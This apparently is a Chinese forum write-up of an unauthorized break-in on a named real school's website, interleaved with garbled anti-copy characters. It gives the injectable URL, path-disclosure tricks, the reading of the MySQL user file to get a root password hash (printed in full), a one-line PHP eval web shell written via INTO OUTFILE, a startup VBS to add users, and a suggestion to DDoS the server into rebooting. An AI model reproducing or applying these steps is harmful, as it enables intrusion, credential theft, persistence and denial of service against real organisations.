友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
  d4 I4 m9 C  y发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
/ K! t) D' F  ]

/ _2 Y! {# t* H2 k* m# F
) [; I6 ]' x* O2 n% a, S  D3 a( C常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

那么想可以直接写入shell ，getshell有几个条件：
  |9 s( _1 M3 a1 i

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

2 a4 E- v6 s- ]; a试着爆绝对路径：
+ x  m  |6 ?+ s* p" A1./phpMyAdmin/index.php?lang[]=1  
; z5 P; ~* W! I! o, o2./phpMyAdmin/phpinfo.php  
4 ?2 y0 h0 u$ v$ Q. d2 \* Q3./load_file()  
/ a3 N( o* B9 Y1 @1 U, {4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
$ K+ H6 k* b/ p5 s% U: U7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

均不行...........................
$ n) ?+ \& A- C& a/ ]
$ r+ U& K/ Y( y1 B御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

% m. S. [7 R1 t3 X! \# e权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
+ C* P# B* _  Q; M& ?" A) B
6 Y4 p+ h2 h# Y敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
& ~& T5 n9 m3 i$ L$ V& K
2 Q- m% J# h7 x, n0 [想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
( @: D" D; D1 g. x$ w
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

5 Z( a; o$ z/ G3 j* R9 \成功读到root密码：
; v/ V+ V4 d5 i$ o+ @% Y/ H
17---- r(0072)
18---- o(006f)
) Q+ `1 Y: {( ~& h19---- o(006f)
! {7 v7 S  r$ P& x+ T20---- t(0074)
21---- *(002a)
22---- 8(0038)
# U: f' B# r/ u1 i* T4 U23---- 2(0032)
/ ?- q9 c* D2 k7 }) _24---- E(0045)
25---- 1(0031)
26---- C(0043)
8 @" s* ]% `8 ^27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
2 f7 H4 ]/ D4 J+ U30---- 8(0038)
31---- A(0041)
# L% h/ u$ }( J# A9 d6 g32---- 9(0039)
33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
5 V$ f2 L8 n- ~% r; b4 e37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
1 l' D+ d3 l) d# U. o( n( j# f40---- 1(0031)
" `3 J* O) |6 [41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
3 X' N4 L% I, F6 b46---- 8(0038)
! r% v! \* {+ t. s- j47---- F(0046)
; d; x* k: @/ A" S48---- F(0046)
$ ~/ V  z$ W( s) Z' Y7 v8 m49---- 4(0034)
& v; f! y) u4 n7 Q" e* ^* B50---- F(0046)
* A' X/ m4 z9 v51---- 0(0030)
0 u. ]3 _: C( Z8 O5 k8 r( b52---- 3(0033)
53---- 2(0032)
+ k6 c3 R5 U6 D0 ]# X% g2 ]) x54---- A(0041)
0 z1 o& y$ s$ ?1 G2 k) M55---- 4(0034)
56---- A(0041)
. ^+ Z3 v4 P5 x. b3 `) L# t) c57---- B(0042)
$ H; ]4 `+ _. _9 h58---- *(0044)
2 c  `, u9 l" w: u59---- *(0035)
60---- *(0041)
8 j: l, b7 z/ C3 z! z61---- *0032)
8 ?6 J/ \2 k' |8 n1 N
解密后成功登陆phpmyamin
, f! j; K; K2 i, ?7 v7 w                          
& K2 I7 Q" L& F
& i# y8 x/ [" r2 @                             
* Z. ]& x9 Q9 X+ }) a7 c. |; l  C, P2 l
$ W, B1 w% W' d! p9 @3 X找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ u! S+ e+ X& R* v; T2 k# K0 i+ k
成功执行，拿下shell，菜刀连接：

. i8 k: z, D; g4 N+ m服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

, X3 U: K. B7 w7 ]9 D. a- N% n

别名     administrators
& M6 i2 J* Q* X& C* W# ^5 L注释     管理员对计算机/域有不受限制的完全访问权

7 G6 p% k* j+ R( U; t

成员

/ |/ ^" ~! r, [6 L- Y' e

-------------------------------------------------------------------------------
/ @  l% f! w9 Z8 b0 Nadmin
Administrator
slipper$
* m) ]# M7 l7 Ysqluser
) y2 T/ \+ S8 r7 F3 s命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
- Q* \6 a( n) k8 y1 p+ j6 Q( i+ \5 W( r5 v
ddos服务器重启，不然就只能坐等服务器重启了...............................
/ Q3 l& |% l5 C) N% C( a2 a, s
  a$ T; m2 @- K# @$ G      

2 X  L7 K  e" T1 M0 {4 r* m

angel